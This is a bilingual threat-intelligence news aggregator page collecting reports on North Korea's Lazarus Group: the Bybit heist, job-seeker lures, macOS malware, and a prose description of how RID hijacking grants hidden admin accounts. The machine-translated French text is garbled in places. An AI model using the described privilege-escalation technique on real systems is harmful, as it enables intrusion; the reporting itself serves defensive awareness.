What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2025-05-07 10:17:41 | Bluenoroff (lien direct) | > également connu sous le nom de heur: trojan-downloader.osx.lazarus.gen
Type:
Menace hybride
Plateforme:
Mac OS 9
Dernière mise à jour:
28/11/24 7:01 AM
Niveau de menace:
High
Description
Ce malware installe une porte dérobée pour l'exécution de la commande distante et abuse du fichier de configuration Zshenv pour la persistance, en contournant les mécanismes de sécurité de MacOS comme les notifications des éléments de connexion.
BLUENOROFF REPLATION DE LA MONAGE
MacScan peut détecter et supprimer la menace hybride Bluenoroff de votre système, ainsi que de protéger d'autres menaces de sécurité et de confidentialité. Un essai de 30 jours est disponible pour scanner votre système pour cette menace.
Télécharger macScan
>also known as HEUR:Trojan-Downloader.OSX.Lazarus.gen Type: Hybrid Threat Platform: Mac OS 9 Last updated: 11/28/24 7:01 am Threat Level: High Description This malware installs a backdoor for remote command execution and abuses the zshenv configuration file for persistence, bypassing macOS’s security mechanisms like Login Items notifications. BlueNoroff Threat Removal MacScan can detect and remove BlueNoroff Hybrid Threat from your system, as well as provide protection against other security and privacy threats. A 30-day trial is available to scan your system for this threat. Download MacScan |
Malware Threat | APT 38 | ★★ |
 |
2025-04-25 17:34:28 | Les pirates nord-coréens APT se présentent en tant qu'entre entreprises pour répandre les logiciels malveillants aux demandeurs d'emploi North Korean APT Hackers Pose as Companies to Spread Malware to Job Seekers (lien direct) |
> Les analystes de menaces de push silencieuses ont découvert une nouvelle campagne de cyberattaque effrayante orchestrée par le groupe de menace persistante avancée (APT) nord-coréen connue sous le nom d'interview contagieuse, également appelée célèbre Chollima, un sous-groupe du célèbre groupe Lazare. Cette entité parrainée par l'État a été impliquée dans de nombreux efforts de cyber-espionnage sophistiqués ciblant les industries mondiales, avec un […] particulier […]
>Silent Push Threat Analysts have uncovered a chilling new cyberattack campaign orchestrated by the North Korean Advanced Persistent Threat (APT) group known as Contagious Interview, also referred to as Famous Chollima, a subgroup of the notorious Lazarus group. This state-sponsored entity has been implicated in numerous sophisticated cyber-espionage efforts targeting global industries, with a particular […] |
Malware Threat | APT 38 | ★★★ |
 |
2025-04-24 19:41:00 | Lazarus frappe 6 entreprises sud-coréennes via Cross Ex, Innix Zero-Day et ThreatNeedle malware Lazarus Hits 6 South Korean Firms via Cross EX, Innorix Zero-Day and ThreatNeedle Malware (lien direct) |
Au moins six organisations en Corée du Sud ont été ciblées par le prolifique groupe de Lazare lié à la Corée du Nord dans le cadre d'une campagne surnommée Opération Synchole.
L'activité a ciblé les logiciels de la Corée du Sud, les logiciels, l'industrie financière, la fabrication de semi-conducteurs et les industries de télécommunications, selon un rapport de Kaspersky publié aujourd'hui. La première preuve de compromis a été détectée pour la première fois dans
At least six organizations in South Korea have been targeted by the prolific North Korea-linked Lazarus Group as part of a campaign dubbed Operation SyncHole. The activity targeted South Korea\'s software, IT, financial, semiconductor manufacturing, and telecommunications industries, according to a report from Kaspersky published today. The earliest evidence of compromise was first detected in |
Malware Vulnerability Threat | APT 38 | ★★★ |
|
2025-04-24 17:07:50 | Lazarus APT cible les organisations en exploitant des vulnérabilités d'une journée Lazarus APT Targets Organizations by Exploiting One-Day Vulnerabilities (lien direct) |
> Une récente campagne de cyber-espionnage par le célèbre groupe de menaces persistantes (APT) de Lazarus avancée (APT), suivie comme «Opération Synchole», a compromis au moins six organisations sud-coréennes à travers les logiciels, l'informatique, le financier, les semi-conducteurs et les secteurs de télécommunications depuis novembre 2024. […]
>A recent cyber espionage campaign by the notorious Lazarus Advanced Persistent Threat (APT) group, tracked as “Operation SyncHole,” has compromised at least six South Korean organizations across software, IT, financial, semiconductor, and telecommunications sectors since November 2024. According to detailed research, the attackers employed a combination of watering hole attacks and exploited vulnerabilities in widely […] |
Vulnerability Threat | APT 38 | ★★★ |
 |
2025-04-24 15:13:32 | Les pirates de Lazarus violent six entreprises dans des attaques de trou d'eau Lazarus hackers breach six companies in watering hole attacks (lien direct) |
Dans une récente campagne d'espionnage, le tristement célèbre groupe de menaces nord-coréen Lazarus a ciblé plusieurs organisations dans les secteurs du logiciel, de l'informatique, des finances et des télécommunications en Corée du Sud. [...]
In a recent espionage campaign, the infamous North Korean threat group Lazarus targeted multiple organizations in the software, IT, finance, and telecommunications sectors in South Korea. [...] |
Threat | APT 38 | ★★★ |
 |
2025-04-16 02:46:50 | APT ROGUES \\ 'Gallery: le cyber-adversaires les plus dangereux du monde \\ APT Rogues\\' Gallery: The World\\'s Most Dangerous Cyber Adversaries (lien direct) |
Les groupes avancés de menace persistante (APT) ne sont pas un nouveau fléau. Ces cyber-adversaires sophistiqués et parrainés par l'État, avec des poches profondes et des compétences techniques très avancées, effectuent des attaques prolongées et ciblées pour infiltrer les réseaux, exfiltrer des données sensibles et perturber l'infrastructure critique. Les enjeux n'ont jamais été plus élevés, donc dans ce blog, nous examinerons certains des acteurs appropriés les plus notoires, leurs tactiques, techniques et procédures uniques (TTPS) et les attaques qui leur sont attribuées, et offrir quelques conseils sur la façon de se défendre contre eux. Le groupe Lazare originaire de la Corée du Nord, le ...
Advanced Persistent Threat (APT) groups are not a new scourge. These sophisticated, state-sponsored cyber adversaries, with deep pockets and highly advanced technical skills, conduct prolonged and targeted attacks to infiltrate networks, exfiltrate sensitive data, and disrupt critical infrastructure. The stakes have never been higher, so in this blog, we\'ll look at some of the most notorious APT actors, their unique Tactics, Techniques, and Procedures (TTPs), and attacks attributed to them, and offer a few tips on how to defend against them. The Lazarus Group Originating from North Korea, the... |
Threat Technical | APT 38 | ★★★ |
|
2025-04-03 17:52:00 | Le groupe Lazarus cible les demandeurs d'emploi avec une tactique Clickfix pour déployer des logiciels malveillants de Golangghost Lazarus Group Targets Job Seekers With ClickFix Tactic to Deploy GolangGhost Malware (lien direct) |
Les acteurs de la menace nord-coréenne derrière une interview contagieuse ont adopté la tactique de l'ingénierie sociale de Clickfix de plus en plus populaire pour attirer les demandeurs d'emploi dans le secteur de la crypto-monnaie pour offrir une porte dérobée au départ sans papiers sans documentation appelée Golangghost sur Windows et MacOS.
La nouvelle activité, évaluée comme étant une continuation de la campagne, a été nommé Code Clickfake Interview par
The North Korean threat actors behind Contagious Interview have adopted the increasingly popular ClickFix social engineering tactic to lure job seekers in the cryptocurrency sector to deliver a previously undocumented Go-based backdoor called GolangGhost on Windows and macOS systems. The new activity, assessed to be a continuation of the campaign, has been codenamed ClickFake Interview by |
Malware Threat | APT 38 | ★★★ |
 |
2025-04-01 13:21:21 | Lazarus apt saute dans le train de Clickfix dans les attaques récentes Lazarus APT Jumps on ClickFix Bandwagon in Recent Attacks (lien direct) |
Une continuation de la campagne nord-coréenne de l'État-nation \\ contre les demandeurs d'emploi utilise l'attaque d'ingénierie sociale pour cibler les organisations CEFI avec la porte dérobée de Golangghost.
A continuation of the North Korean nation-state threat\'s campaign against employment seekers uses the social engineering attack to target CeFi organizations with the GolangGhost backdoor. |
Threat | APT 38 | ★★ |
 |
2025-02-27 15:28:39 | Le FBI exhorte la communauté crypto à éviter le blanchiment de fonds de Bybit Hack FBI urges crypto community to avoid laundering funds from Bybit hack (lien direct) |
Le Bureau a attribué le piratage de 1,5 milliard de dollars à l'acteur de menace nord-coréen connu sous le nom de TraderTraitor, ou Lazarus, à la suite d'évaluations similaires de chercheurs en cybersécurité.
The bureau attributed the $1.5 billion hack to the North Korean threat actor known as TraderTraitor, or Lazarus, following similar assessments by cybersecurity researchers. |
Hack Threat | APT 38 | ★★★ |
|
2025-02-27 12:45:00 | Bybit Hack Traced to Safe {Wallet} Attaque de la chaîne d'approvisionnement exploitée par des pirates nord-coréens Bybit Hack Traced to Safe{Wallet} Supply Chain Attack Exploited by North Korean Hackers (lien direct) |
Le Federal Bureau of Investigation (FBI) des États-Unis a officiellement lié le piratage record de 1,5 milliard de dollars à des acteurs de menace nord-coréens, alors que le PDG de la société Ben Zhou a déclaré une «guerre contre Lazare».
L'agence a déclaré que la République de Corée du peuple démocrate (Corée du Nord) était responsable du vol des actifs virtuels de l'échange de crypto-monnaie, l'attribuant à un cluster spécifique
The U.S. Federal Bureau of Investigation (FBI) formally linked the record-breaking $1.5 billion Bybit hack to North Korean threat actors, as the company\'s CEO Ben Zhou declared a "war against Lazarus." The agency said the Democratic People\'s Republic of Korea (North Korea) was responsible for the theft of the virtual assets from the cryptocurrency exchange, attributing it to a specific cluster |
Hack Threat | APT 38 | ★★★ |
|
2025-02-25 10:16:39 | La Lazarus de la Corée du Nord réalise le plus grand braquage cryptographique de l'histoire North Korea\\'s Lazarus Pulls Off Biggest Crypto Heist in History (lien direct) |
Les cyberattaques qui seraient affiliés au groupe de menaces parrainé par l'État ont réussi le plus grand braquage cryptographique signalé à ce jour, volant 1,5 milliard de dollars de borbit de bourse. Il a été réalisé en interférant avec un transfert de routine entre les portefeuilles.
Cyberattackers believed to be affiliated with the state-sponsored threat group pulled off the largest crypto heist reported to date, stealing $1.5 billion from exchange Bybit. It was carried out by interfering with a routine transfer between wallets. |
Threat | APT 38 | ★★★★ |
|
2025-02-14 23:58:00 | Lazarus Group Deploys Marstech1 JavaScript Implant in Targeted Developer Attacks (lien direct) | The North Korean threat actor known as the Lazarus Group has been linked to a previously undocumented JavaScript implant named Marstech1 as part of limited targeted attacks against developers.
The active operation has been dubbed Marstech Mayhem by SecurityScorecard, with the malware delivered by means of an open-source repository hosted on GitHub that\'s associated with a profile named "
The North Korean threat actor known as the Lazarus Group has been linked to a previously undocumented JavaScript implant named Marstech1 as part of limited targeted attacks against developers. The active operation has been dubbed Marstech Mayhem by SecurityScorecard, with the malware delivered by means of an open-source repository hosted on GitHub that\'s associated with a profile named " |
Malware Threat | APT 38 | ★★ |
 |
2025-02-11 20:00:00 | Cybercrime: A Multifaceted National Security Threat (lien direct) | Executive Summary Cybercrime makes up a majority of the malicious activity online and occupies the majority of defenders\' resources. In 2024, Mandiant Consulting responded to almost four times more intrusions conducted by financially motivated actors than state-backed intrusions. Despite this overwhelming volume, cybercrime receives much less attention from national security practitioners than the threat from state-backed groups. While the threat from state-backed hacking is rightly understood to be severe, it should not be evaluated in isolation from financially motivated intrusions. A hospital disrupted by a state-backed group using a wiper and a hospital disrupted by a financially motivated group using ransomware have the same impact on patient care. Likewise, sensitive data stolen from an organization and posted on a data leak site can be exploited by an adversary in the same way data exfiltrated in an espionage operation can be. These examples are particularly salient today, as criminals increasingly target and leak data from hospitals. Healthcare\'s share of posts on data leak sites has doubled over the past three years, even as the number of data leak sites tracked by Google Threat Intelligence Group has increased by nearly 50% year over year. The impact of these attacks mean that they must be taken seriously as a national security threat, no matter the motivation of the actors behind it. Cybercrime also facilitates state-backed hacking by allowing states to purchase cyber capabilities, or co-opt criminals to conduct state-directed operations to steal data or engage in disruption. Russia has drawn on criminal capabilities to fuel the cyber support to their war in Ukraine. GRU-linked APT44 (aka Sandworm), a unit of Russian military intelligence, has employed malware available from cybercrime communities to conduct espionage and disruptive operations in Ukraine and CIGAR (aka RomCom), a group that historically focused on cybercrime, has conducted espionage operations against the Ukrainian government since 2022. However, this is not limited to Russia. Iranian threat groups deploy ransomware to raise funds while simultaneously conducting espionage, and Chinese espionage groups often supplement their income with cybercrime. Most notably, North Korea uses state-backed groups to directly generate revenue for the regime. North Korea has heavily targeted cryptocurrencies, compromising exchanges and individual victims\' crypto wallets. Despite the overlaps in effects and collaboration with states, tackling the root causes of cybercrime requires fundamentally different solutions. Cybercrime involves collaboration between disparate groups often across borders and without respect to sovereignty. Any solution requires international cooperation by both law enforcement and intelligence agencies to track, arrest, and prosecute these criminals. Individual takedowns can have important temporary effects, but the collaborative nature of cybercrime means that the disrupted group will be quickly replaced by others offering the same service. Achieving broader success will require collaboration between countries and public and private sectors on systemic solutions such as increasing education and resilience efforts. aside_block | Ransomware Malware Tool Vulnerability Threat Legislation Medical Cloud Technical | APT 41 APT 38 APT 29 APT 43 APT 44 | ★★★ |
|
2025-01-29 22:26:00 | Lazarus Group Uses React-Based Admin Panel to Control Global Cyber Attacks (lien direct) | The North Korean threat actor known as the Lazarus Group has been observed leveraging a "web-based administrative platform" to oversee its command-and-control (C2) infrastructure, giving the adversary the ability to centrally supervise all aspects of their campaigns.
"Each C2 server hosted a web-based administrative platform, built with a React application and a Node.js API," SecurityScorecard\'s
The North Korean threat actor known as the Lazarus Group has been observed leveraging a "web-based administrative platform" to oversee its command-and-control (C2) infrastructure, giving the adversary the ability to centrally supervise all aspects of their campaigns. "Each C2 server hosted a web-based administrative platform, built with a React application and a Node.js API," SecurityScorecard\'s |
Threat | APT 38 | ★★★ |
|
2025-01-29 21:39:00 | Researchers Uncover Lazarus Group Admin Layer for C2 Servers (lien direct) | The threat actor is using a sophisticated network of VPNs and proxies to centrally manage command and control servers from Pyongyang.
The threat actor is using a sophisticated network of VPNs and proxies to centrally manage command and control servers from Pyongyang. |
Threat | APT 38 | ★★★ |
 |
2025-01-25 20:07:25 | Hackers Using RID Hijacking To Create Admin Accounts In Windows (lien direct) | Cybersecurity researchers at AhnLab have discovered that a North Korean threat group uses malicious files to hijack RIDs and grant admin access to low-privilege Windows accounts.
According to ASEC researchers, AhnLab’s security intelligence center, the hacking group behind the attack is the “Andariel” threat group, linked to North Korea’s Lazarus hacker group.
“RID Hijacking is an attack technique that involves modifying the RID value of an account with low privileges, such as a regular user or a guest account, to match the RID value of an account with higher privileges (Administrator). By modifying the RID value, threat actors can deceive the system into treating the account as having administrator privileges,” AhnLab wrote in a blog post published on Thursday.
In Windows, a Relative Identifier (RID) is part of a Security Identifier (SID), which exclusively distinguishes each user and group within a domain. For instance, an administrator account will have a RID value of “500”, “501” for guest accounts, “512” for the domain admins group, and for regular users, the RID will start from the value “of 1000”.
In a RID hijacking attack, hackers change the RID of a low-privilege account to the same value as an administrator account. As a result, Windows grants administrative privileges to the account.
However, to pull this off, attackers need access to the SAM (Security Account Manager) registry, which requires them to already have SYSTEM-level access to the targeted machine for modification.
Attackers typically use tools such as PsExec and JuicyPotato to escalate their privileges and launch a SYSTEM-level command prompt.
While SYSTEM access is the highest privilege in Windows, it has certain limitations: it doesn\'t allow remote access, cannot interact with GUI apps, generates noisy activity that can be easily detected and doesn\'t persist after a system reboot.
To work around these issues, Andariel first created a hidden, low-privilege local user account by appending a “$” character to its username.
This made the account invisible in regular listings but still accessible in the SAM registry. The attackers then carried out RID hijacking to escalate the account’s privileges to the administrator level.
According to the researchers, Andariel added the modified account to the Remote Desktop Users and Administrators groups, giving them more control over the system.
The group tweaked the SAM registry using custom malware and an open-source tool to execute the RID hijacking.
Although SYSTEM access could allow the direct creation of administrator accounts, this method is less conspicuous, making it difficult to detect and prevent.
To avoid detection, Andariel also exported and backed up the modified registry settings, deleted the rogue account, and restored it later from the backup when needed, bypassing system logs and making detection even harder.
To reduce the risk of RID hijacking, system administrators should implement proactive measures such as:
Use the Local Security Authority (LSA) Subsystem Service to monitor unusual login attempts and password changes.
Prevent unauthorized access to the SAM registry.
Restricting the use of tools like PsExec and JuicyPotato.
Disabling guest accounts.
Enforcing multi-factor authentication (MFA) for all user accounts, including low-privileged ones.
Cybersecurity researchers at AhnLab have discovered that a North Korean threat group uses malicious files to hijack RIDs and grant admin access to low-privilege Windows accounts. According to ASEC researchers, AhnLab’s security intelligence center, the hacking group behind the attack is the “Andariel” threat group, linked to North Korea’s Lazarus hacker group. “RID Hijacking is |
Malware Tool Threat | APT 38 APT 45 | ★★ |
|
2025-01-15 21:07:00 | Lazarus Group Targets Web3 Developers with Fake LinkedIn Profiles in Operation 99 (lien direct) | The North Korea-linked Lazarus Group has been attributed to a new cyber attack campaign dubbed Operation 99 that targeted software developers looking for freelance Web3 and cryptocurrency work to deliver malware.
"The campaign begins with fake recruiters, posing on platforms like LinkedIn, luring developers with project tests and code reviews," Ryan Sherstobitoff, senior vice president of Threat
The North Korea-linked Lazarus Group has been attributed to a new cyber attack campaign dubbed Operation 99 that targeted software developers looking for freelance Web3 and cryptocurrency work to deliver malware. "The campaign begins with fake recruiters, posing on platforms like LinkedIn, luring developers with project tests and code reviews," Ryan Sherstobitoff, senior vice president of Threat |
Malware Threat | APT 38 | ★★ |
 |
2024-12-30 12:02:43 | Weekly OSINT Highlights, 30 December 2024 (lien direct) | ## Snapshot
Last week\'s OSINT reporting highlights the persistence and evolution of cyber threats targeting a wide range of sectors, from cryptocurrency exchanges to aerospace and defense industries. The predominant attack vectors include phishing, exploitation of long-standing vulnerabilities, and the use of advanced malware like StealBit, OtterCookie, and VBCloud. Threat actors such as North Korea\'s Lazarus Group and TraderTraitor, as well as botnets like FICORA and CAPSAICIN, continue to refine their tactics, leveraging social engineering, compromised software repositories, and ransomware-as-a-service to achieve their objectives. These campaigns predominantly target high-value organizations and unpatched systems, emphasizing the importance of addressing known vulnerabilities and monitoring for sophisticated attack chains.
## Description
1. [StealBit Data Exfiltration Tool](https://sip.security.microsoft.com/intel-explorer/articles/68a374b4): The LockBit ransomware group employs StealBit as part of its ransomware-as-a-service program, facilitating data theft in double extortion attacks. Recent updates to the tool broaden its target base and enhance efficiency, allowing faster data exfiltration and streamlined operations.
1. [FICORA and CAPSAICIN Botnets](https://sip.security.microsoft.com/intel-explorer/articles/77c183a0): FortiGuard Labs observed global activity from the FICORA and CAPSAICIN botnets, exploiting long-standing vulnerabilities in D-Link devices. These botnets, targeting unpatched systems, leverage DDoS capabilities and advanced features to dominate infected devices, focusing on East Asia and other global regions.
1. [OtterCookie and the Contagious Interview Campaign](https://sip.security.microsoft.com/intel-explorer/articles/b5a152a8): North Korean actors deploy OtterCookie malware through fake job offers to developers, targeting cryptocurrency wallets and sensitive data. Infection methods include compromised GitHub and npm projects, with evolving variants enhancing data theft and lateral movement.
1. [TraderTraitor\'s $308 Million Cryptocurrency Heist](https://sip.security.microsoft.com/intel-explorer/articles/9cd8b8b5): The North Korean TraderTraitor group stole $308 million from Japan\'s DMM Bitcoin, leveraging LinkedIn for social engineering and GitHub for malware delivery. By compromising a Japanese cryptocurrency wallet company, the group infiltrated systems to manipulate legitimate transactions.
1. [Lazarus Group\'s DeathNote Campaign](https://sip.security.microsoft.com/intel-explorer/articles/3b7cea68): Lazarus Group continues targeting industries like aerospace and cryptocurrency through Operation DreamJob, using trojanized tools and DLL side-loading techniques. Recent attacks deploy advanced malware strains to evade detection, establish persistence, and enable lateral movement within targeted systems.
1. [Cloud Atlas 2024 Campaigns](https://sip.security.microsoft.com/intel-explorer/articles/caa75881): Cloud Atlas targets Eastern Europe and Central Asia with phishing emails exploiting Equation Editor vulnerabilities, delivering VBShower and VBCloud malware. These tools use PowerShell scripts for data theft, lateral movement, and exfiltration, with region-specific tactics to avoid detection.
## Copyright
**© Microsoft 2024**. All rights reserved. Reproduction or distribution of the content of this site, or any part thereof, without written permission of Microsoft is prohibited.
## Snapshot Last week\'s OSINT reporting highlights the persistence and evolution of cyber threats targeting a wide range of sectors, from cryptocurrency exchanges to aerospace and defense industries. The predominant attack vectors include phishing, exploitation of long-standing vulnerabilities, and the use of advanced malware like StealBit, OtterCookie, and VBCloud. Threat actors such as North Korea\'s Lazarus Group and TraderTraitor, as well as botnets like FICORA and CAPSAICIN, continue to refine their tactics, leveraging |
Ransomware Malware Tool Vulnerability Threat Cloud | APT 38 | ★★ |
|
2024-12-23 20:06:03 | Lazarus Group Targets Nuclear Industry with CookiePlus Malware (lien direct) | KEY SUMMARY POINTS Securelist by Kaspersky has published its latest threat intelligence report focused on the activities of…
KEY SUMMARY POINTS Securelist by Kaspersky has published its latest threat intelligence report focused on the activities of… |
Malware Threat | APT 38 | ★★★★ |
|
2024-12-20 16:14:00 | Lazarus Group Spotted Targeting Nuclear Engineers with CookiePlus Malware (lien direct) | The Lazarus Group, an infamous threat actor linked to the Democratic People\'s Republic of Korea (DPRK), has been observed leveraging a "complex infection chain" targeting at least two employees belonging to an unnamed nuclear-related organization within the span of one month in January 2024.
The attacks, which culminated in the deployment of a new modular backdoor referred to as CookiePlus, are
The Lazarus Group, an infamous threat actor linked to the Democratic People\'s Republic of Korea (DPRK), has been observed leveraging a "complex infection chain" targeting at least two employees belonging to an unnamed nuclear-related organization within the span of one month in January 2024. The attacks, which culminated in the deployment of a new modular backdoor referred to as CookiePlus, are |
Malware Threat | APT 38 | ★★★★ |
|
2024-11-18 12:22:31 | Weekly OSINT Highlights, 18 November 2024 (lien direct) | ## Snapshot Last week\'s OSINT reporting highlights a diverse array of cyber threats, including ransomware, phishing, espionage, and supply chain attacks. Key trends include evolving attack vectors like malicious .LNK files and PowerShell-based lateral movements, as seen in campaigns targeting Pakistan and other regions. Threat actors span from state-sponsored groups such as North Korea\'s Lazarus and China\'s TAG-112 to financially motivated groups like SilkSpecter, with targets including critical sectors like manufacturing, government, healthcare, and e-commerce. Information stealers emerged as a notable theme, with malware such as RustyStealer, Fickle Stealer, and PXA Stealer employing advanced obfuscation and multi-vector attacks to exfiltrate sensitive data from diverse sectors. The reports underscore sophisticated evasion tactics, the leveraging of legitimate platforms for malware delivery, and the persistent targeting of vulnerable backup and storage systems. ## Description 1. [Ymir Ransomware Attack](https://sip.security.microsoft.com/intel-explorer/articles/1444d044): Researchers at Kaspersky identified Ymir, a ransomware variant that performs operations entirely in memory and encrypts data using the ChaCha20 algorithm. Attackers used PowerShell-based lateral movement and reconnaissance tools, employing RustyStealer malware to gain initial access and steal data, targeting systems in Colombia among other regions. 1. [WIRTE Group Cyber Attacks](https://sip.security.microsoft.com/intel-explorer/articles/17c5101d): Check Point Research linked WIRTE, a Hamas-connected group, to espionage and disruptive cyber attacks in 2024, including PDF lure-driven Havoc framework deployments and SameCoin wiper campaigns targeting Israeli institutions. WIRTE, historically aligned with the Molerats, focuses on politically motivated attacks in the Middle East, showcasing ties to Gaza-based cyber activities. 1. [DoNot Group Targets Pakistani Manufacturing](https://sip.security.microsoft.com/intel-explorer/articles/25ee972c): The DoNot group launched a campaign against Pakistan\'s manufacturing sector, focusing on maritime and defense industries, using malicious .LNK files disguised as RTF documents to deliver stager malware via PowerShell. The campaign features advanced persistence mechanisms, updated AES encryption for C&C communications, and dynamic domain generation, highlighting their evolving evasion tactics. 1. [Election System Honeypot Findings](https://sip.security.microsoft.com/intel-explorer/articles/1a1b4eb7): Trustwave SpiderLabs\' honeypot for U.S. election infrastructure recorded attacks like brute force, SQL injection, and CVE exploits by botnets including Mirai and Hajime. The attacks, largely driven by exploit frameworks and dark web collaboration, underline persistent threats against election systems. 1. [Chinese TAG-112 Tibetan Espionage](https://sip.security.microsoft.com/intel-explorer/articles/11ae4e70): In May 2024, TAG-112, suspected to be Chinese state-sponsored, compromised Tibetan community websites via Joomla vulnerabilities to deliver Cobalt Strike payloads disguised as security certificates. The campaign reflects Chinese intelligence\'s enduring interest in monitoring and disrupting Tibetan and other minority organizations. 1. [Phishing Campaigns Exploit Ukrainian Entities](https://sip.security.microsoft.com/intel-explorer/articles/95253614a): Russian-linked threat actor UAC-0194 targeted Ukrainian entities with phishing campaigns, exploiting CVE-2023-320462 and CVE-2023-360251 through malicious hyperlinks in emails. The attacks leveraged compromised municipal servers to host malware and facilitate privilege escalation and security bypasses. 1. [Lazarus Group\'s MacOS Targeting](https://sip.security.microsoft.com/intel-explorer/articles/7c6b391d): Lazarus, a North Korean threat actor, deployed RustyAttr malware targeting macOS via malicious apps using Tauri framework, hiding payloads in Extended Attributes (EA). This campaign reflects evolvin | Ransomware Malware Tool Vulnerability Threat Prediction Medical Cloud Technical | APT 41 APT 38 | ★★★ |
|
2024-11-15 15:40:32 | Hackers use macOS extended file attributes to hide malicious code (lien direct) | ## Snapshot
Researchers at Group-IB have identified a new trojan targeting macOS, dubbed RustyAttr, that leverages extended attributes (EAs) in macOS files to conceal malicious code.
## Description
EA is meta data associated with files and directories in different file systems. This code smuggling is reminiscent of the [Bundlore adware approach in 2020](https://security.microsoft.com/intel-explorer/articles/71a3eed3), which also targeted macOS by hiding payloads in resource forks. Resource forks were mostly deprecated and replaced by the application bundle structure and EA. The RustyAttr malware uses the Tauri framework to build malicious apps that execute a shell script stored within an EA named \'test.\' Tauri creates lightweight desktop apps with a web frontend (HTML, CSS, JavaScript) and a Rust backend. These apps run a JavaScript that retrieves the shell script from the \'test\' EA and executes it. Some samples simultaneously launch decoy PDFs or error dialogs to distract the user. The decoy PDFs, and one of the malicious application bundles, were sourced from a pCloud instance containing cryptocurrency-related content. The applications were likely signed with a leaked certificate that Apple has since revoked. MacOS Gatekeeper currently blocks these applications from running unless the user actively chooses to override these malware protections.
Although Group-IB couldn\'t analyze the next-stage malware, they found that the staging server connects to a known North Korean threat actor group Lazarus\' (tracked by Microsoft as [Diamond Sleet](https://security.microsoft.com/intel-profiles/b982c8daf198d93a2ff52b92b65c6284243aa6af91dda5edd1fe8ec5365918c5)) infrastructure endpoint. Group-IB researchers suggest that Lazarus is trying out new ways to deliver malware. This discovery comes alongside a similar [report from SentinelLabs](https://security.microsoft.com/intel-explorer/articles/aea544a9) about the North Korean threat actor BlueNoroff (tracked by Microsoft as [Sapphire Sleet](https://security.microsoft.com/intel-profiles/45e4b0c21eecf6012661ef6df36a058a0ada1c6be74d8d2011ea3699334b06d1)), which has been using related evasion techniques on macOS, including cryptocurrency-themed phishing and modified \'Info.plist\' files to retrieve second-stage payloads. It remains unclear if the RustyAttr and BlueNoroff campaigns are connected, but it highlights a trend of North Korean hackers focusing on macOS systems for their operations.
## Recommendations
Group-IB recommends keeping macOS Gatekeeper enabled to protect your system from harmful software.
Additionally, Microsoft recommends the following mitigations to reduce the impact of this threat.
• Only install apps from trusted sources and official stores, like the Google Play Store and Apple App Store.
• Never click on unknown links received through ads, SMS messages, emails, or similar untrusted sources.
• Avoid granting SMS permissions, notification listener access, or accessibility access to any applications without a strong understanding of why the application needs it.
• To learn more about preventing trojans or other malware from affecting individual devices, [read about preventing malware infection](https://www.microsoft.com/security/business/security-101/what-is-malware).
## References
[Hackers use macOS extended file attributes to hide malicious code](https://www.bleepingcomputer.com/news/security/hackers-use-macos-extended-file-attributes-to-hide-malicious-code/). Bleeping Computer (accessed 2024-11-14)
[Stealthy Attributes of APT Lazarus: Evading Detection with Extended Attributes](https://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/). Group-IB (accessed 2024-11-14)
## Copyright
**© Microsoft 2024**. All rights reserved. Reproduction or distribution of the content of this site, or any part thereof, without written permission of Microsoft is prohibited.
## Snapshot Researchers at Group-IB have ide |
Malware Threat Prediction | APT 38 | ★★ |
|
2024-11-14 15:21:00 | New RustyAttr Malware Targets macOS Through Extended Attribute Abuse (lien direct) | Threat actors have been found leveraging a new technique that abuses extended attributes for macOS files to smuggle a new malware called RustyAttr.
The Singaporean cybersecurity company has attributed the novel activity with moderate confidence to the infamous North Korea-linked Lazarus Group, citing infrastructure and tactical overlaps observed in connection with prior campaigns, including
Threat actors have been found leveraging a new technique that abuses extended attributes for macOS files to smuggle a new malware called RustyAttr. The Singaporean cybersecurity company has attributed the novel activity with moderate confidence to the infamous North Korea-linked Lazarus Group, citing infrastructure and tactical overlaps observed in connection with prior campaigns, including |
Malware Threat | APT 38 | ★★★ |
|
2024-10-28 11:27:40 | Faits saillants hebdomadaires, 28 octobre 2024 Weekly OSINT Highlights, 28 October 2024 (lien direct) |
## Instantané La semaine dernière, les rapports de \\ sont mettant en évidence un éventail de types d'attaques dirigés par des acteurs sophistiqués parrainés par l'État et des menaces criminelles, avec des attaques notables ciblant les secteurs de la crypto-monnaie, du gouvernement et des infrastructures critiques.Les principaux vecteurs d'attaque incluent des campagnes de phishing, l'exploitation des vulnérabilités logicielles et des logiciels malveillants avancés et des outils tels que la grève de Cobalt, le ransomware et les botnets, tirant parti des CVE connus et des défauts d'exécution spéculatifs.Des groupes APT alignés par l'État, tels que les acteurs de la menace alignés par Lazare et la Russie, ont mené des attaques contre les plateformes de crypto-monnaie et les entités politiques, tandis que les opérations d'influence liées à la Russie ont utilisé du contenu généré par l'IA pour amplifier les récits de division avant les élections américaines de 2024.Pendant ce temps, les botnets et les modèles de ransomwares en tant que service comme Beast Raas ont démontré des progrès techniques dans la persistance, le chiffrement et les techniques d'exfiltration des données. ## Description 1. [Campagne Heptax] (https://sip.security.microsoft.com/intel-explorer/articles/CE9F9A25): la recherche Cyble a découvert la campagne Heptax ciblant les organisations de soins de santé par le biais de fichiers LNK malveillants distribués par e-mails de phishing.Les attaquants utilisent des scripts PowerShell pour réduire les paramètres de sécurité, permettant un accès à distance, une extraction de mot de passe et une surveillance du système pour une exfiltration de données prolongée. 2. [Wrnrat Malware] (https://sip.security.microsoft.com/intel-explorer/articles/118a2c8f): AhnLab a identifié WRNRAT malware distribué via de faux sites de jeu de jeu, destiné à la thèse de données motivés financièrement et au contrôle des systèmes infectés infectés.Une fois téléchargé, le malware capture les écrans utilisateur, envoie des informations système et met fin aux processus spécifiques tout en se déguisant en un processus Internet Explorer. 3. [Fortimanager Exploit] (https://sip.security.microsoft.com/intel-explorer/articles/2f35a4ca): Mandiant a rapporté UNC5820 \\ 's Exploitation of a fortimanager vulnérabilité zéro-jour (CVE-2024-47575)Pour exécuter du code et voler des données de configuration.L'attaque a ciblé les dispositifs FortiGate dans plusieurs industries, posant un risque de mouvement latéral grâce à des informations d'identification récoltées et à des informations sur les appareils. 4. [Black Basta \'s Social Engineering] (https://sip.security.microsoft.com/intel-explorer/articles/b231776f): Reliaquest documenté Black Basta Ransomware \\ est une ingénierie sociale avancée, y comprisSpam par e-mail de masse et imitations des équipes Microsoft, pour inciter les utilisateurs à installer des outils RMM ou à scanner les codes QR.Ces tactiques facilitent le déploiement des ransomwares via AnyDesk, soulignant la nécessité d'un e-mail et d'un compte vigilantsécurité. 5. [Ransomware embargo] (https://sip.security.microsoft.com/intel-explorer/articles/b7f0fd7b): eset 